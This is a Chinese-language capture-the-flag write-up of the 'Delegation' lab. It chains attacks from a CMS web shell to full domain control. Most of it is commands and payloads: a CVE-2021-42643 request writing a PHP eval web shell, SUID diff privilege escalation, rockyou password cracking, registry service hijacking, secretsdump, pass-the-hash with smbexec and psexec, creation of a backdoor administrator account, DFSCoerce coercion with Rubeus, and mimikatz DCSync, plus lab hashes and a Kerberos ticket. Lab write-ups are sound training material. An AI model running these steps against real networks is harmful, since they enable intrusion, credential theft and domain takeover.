春秋云镜 Delegation

# cve-2021-42643 (写马)

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.145.25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=76k928kpbpau54uj05b06s920r; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Referer: http://39.99.145.25/index.php?case=admin&act=login&admin_dir=admin&site=default
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php @eval($_POST[bp]);?>

用蚁剑连接 1.php，密码 bp

发现 home 目录有 flag 但没法读，看一下 suid 能不能提权

find / -user root -perm -4000 -print 2>/dev/null

# diff 提权

发现 diff 可以提权

# flag01

利用 diff 读取 flag

diff --line-format=%L /dev/null /home/flag/flag01.txt

# fscan(172.22.4.36)

直接传入 fscan 扫描
web1 是 172.22.4.36

发现有 win19，因为 flag1 提示了 win19 \Adrian ，还给了 rockyou，感觉是爆破密码，继续用 fscan 扫一下 172.22.4.45

发现了 3389 远程端口

# rockyou 爆破密码

rockyou 爆破一下密码

proxychains4 -q crackmapexec smb 172.22.4.45 -u "Adrian" -p /usr/share/wordlists/rockyou.txt --local-auth

得到密码

win19\Adrian babygirl1

直接利用代理登陆，发现密码过期

# rdesktop

kali 下的 rdesktop 命令可以无用户连接，然后修改密码

proxychains rdesktop 172.22.4.45

我尝试修改密码时报错

直接命令修改密码一下
看了 h0ny 师傅 wp 才知道，直接用一下命令登陆，会直接要你修改密码

proxychains4 -q rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z

进入之后发现桌面上有一个 PrivescCheck 文件夹，里面有 PrivesCheck_WIN19.html

在扫描报告中显示，有权限对该 SYSTEM 服务的注册表路径进行修改：

只需要将该服务程序更改为恶意服务程序，再启动该服务，即可获取主机 SYSTEM 权限。

PS C:\Users\Adrian\Desktop> reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\windows.exe" /f
操作成功完成。
PS C:\Users\Adrian\Desktop> reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\gupdate
    ImagePath    REG_EXPAND_SZ    C:\Users\Adrian\Desktop\windows.exe

# 启动 gupdate 服务

cmd /c "sc start gupdate"

然后 vshell 老方法正向连接 172.22.4.45，成功上线

但是我上线的不是 administer 用户，查看不了 flag
看狗 and 猫 wp 直接上线 admin
师傅的 wp 说执行 gupdate 服务之后会有三个文件解密一下

secretsdump.py LOCAL -system system -sam sam -security security

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:21b11500d5834a2b9b3373564a0565f6(这个值可能不一样，admin密码哈希应该是一样的)

# PHT 攻击 (system)

直接用 admin 的 hash 打 PHT 拿 shell

proxychains python3 smbexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

# flag02

type C:\Users\Administrator\flag\flag02.txt

# 创建新用户

net user bp qwer1234! /add
net localgroup administrators bp /add

成功创建，登录之后放上马，直接正向连接，终于是 Administrator 了

# bloodhound

用 bloodhound (哈希是 $MACHINE.ACC 的) 跑一下

从 bloodhound 的输出以及题目名不难猜到后面是要打 WIN19 + DC01 的非约束委派，参考红队域渗透 NTLM Relay：强制认证方式总结，用 DFSCoerce 拿域控

首先用新创的 admin 账号登录 win，然后用管理员权限运行 Rubeus:

Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

使用 DFSCoerce 漏洞利用工具，触发辅域控进行强制验证

proxychains python3 dfscoerce.py -u win19$ -hashes "aad3b435b51404eeaad3b435b51404ee:21b11500d5834a2b9b3373564a0565f6" -d xiaorang.lab win19 172.22.4.7

可以看到我们获得 base64 之后的 tgt 票据了，本地解 base64 之后直接保存为 DC01.kirbi

echo 'doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD4XWHjk+FgJ7StHgWpxBZMIeIFo6CAWfx+LPTJsPuHAQhrd2E8jfcZUtd+PItWm08N2WqkD0U0Pd4C1syVwws4d0nBwyD7Xi0pLXCv9Ra3DToEN18lVTMjAu6DEH2dU3rutSPq5b6mxAN/h2VjseZ8ZhOTz1l+8C5eH6tlxK/azhMzEXn8/UzpWlo6nHgkgkTscKxZMjM1sH7lqb55BzvzWCDX1Y/ZtTID/012OoYhMqCS3IF0pHXrQ6c/6PdfgmWLWfK0yi5cJmFuwa83lZOV7XdIva0+wPsr+7+mpLWRzPkrTQra5laXU+clgc01w4Wo4l2X/5z2Ej/ZBH2h6qPR6eVPtnJT47KP9rKb7ElIAZ7ddGzkI0PhL5lDCmGZhLFrvsPo305kuDiIdRQtL/qv+xp372mPIAvMzFxDEFfMweP8wykvcqAXFGzuFQNE6o08BIm6Tyy3tIyrj/2xtaR9OkbqSYbM9eiDvzaxpFwn3zthjFxUes6m0DUvptvl5WT9Embun9qsnRQWv/8ZFBVKPupd+rujUrOZydIZLnOT5NmU3dG+VIFiDzTUcPlrc+AxaysxVC2EVkaj8/xsFerRzIgBauaEtG2T50+GHPvlOJ4fos5MZ08xUwMz+uHUf1k9IcyXhdGdGnCfJt0b1WW5zUqULVGFyUbZjNeAE87qKIISr3oF8cR6Cu+T7GcYMsO0+K1jWKB7Bw95Xj51RAreWA9GDcPRHaSgCnnbg7Whrk4tJi3xC+2ONoVItbcPVbbwqCzbIeGQuMft9pZUtCCnXd6KLxSYjyVzgicXO5OVeVSRSGQ4cebyLX4ASDrFjtcroCLgk7AWdOtSptFwz7KFkKrtNKZmYxrFzHMvZ8T7BPi5JHu7wegNfSCr8nUVYzhYpUJOMhEF8xeZUUfZ9yVAo4NCad/bf8AQzgwDV6LLuAufOaOyOw/CthgWo0jjbwBcS5jxdIrEHQvGCGzV/9+BIvBH2c1f5ji/bbP4zuGHHILWO4P1/IYEljqBPvy5MJhNi4+l39ZXELin3pn/BnGhyQBOiDig5kpSL90o+Nk+M48aESP9riRjRAV6WyiVeueq0YBgt0L/SM+YDpvcrMl1bFUHMiDtnnllhsWnDDGEGCwXEba6zDF7kQOF624UoOmK31GEEYRQNTLzdZGlT10fQodpJe/PhwC22xGqX55ckAOFNmR3iwGqwJkQp19nR1O0RBGMLdrYJ/S0NA6SgZogDySaeaDLV2VWAO4JQovYT3pgqTY9J3MH5PI8JoqRTB1zBcW6nIj4kxav/Y0zvB+p6WMnu16A/6FOZHUOomiIzCLBCQ/P2QsHmA4t1Qc12VYlwVRJ6R+nTxaEMKLu8FXnPNBJjPMhoOrl7zyvaSxuJERgbkrB0/tQMfFnY6NmCqBXdLbM7Wfmhpe7yWmou/nj2N+QZN5hToIfk0iQ6FJWjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCFolBmcvdXrR5NMOdEo5ECsBP+BDqRIqfZRDJDnIZMt6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDIzMDkyMzE1Mjc0NVqmERgPMjAyMzA5MjQwMTI3NDVapxEYDzIwMjMwOTMwMTUyNzQ1WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==' | base64 -d > DC01.kirbi

然后传一个 mimikatz 上去，用 DCSync 功能获得域控哈希：

mimikatz.exe "kerberos::purge" "kerberos::ptt DC01.kirbi" "lsadump::dcsync /domain:xiaorang.lab /user:administrator" "exit"

# psexec.py

获得域控哈希，最后横传一下域内还没打下的机器即可
kali 在 /home/baonoob/tools/Impacket/examples
### flag3

proxychains python3  psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/Administrator@172.22.4.19

type C:\Users\Administrator\flag\flag03.txt

# flag4

proxychains python3 psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7 

type C:\Users\Administrator\flag\flag04.txt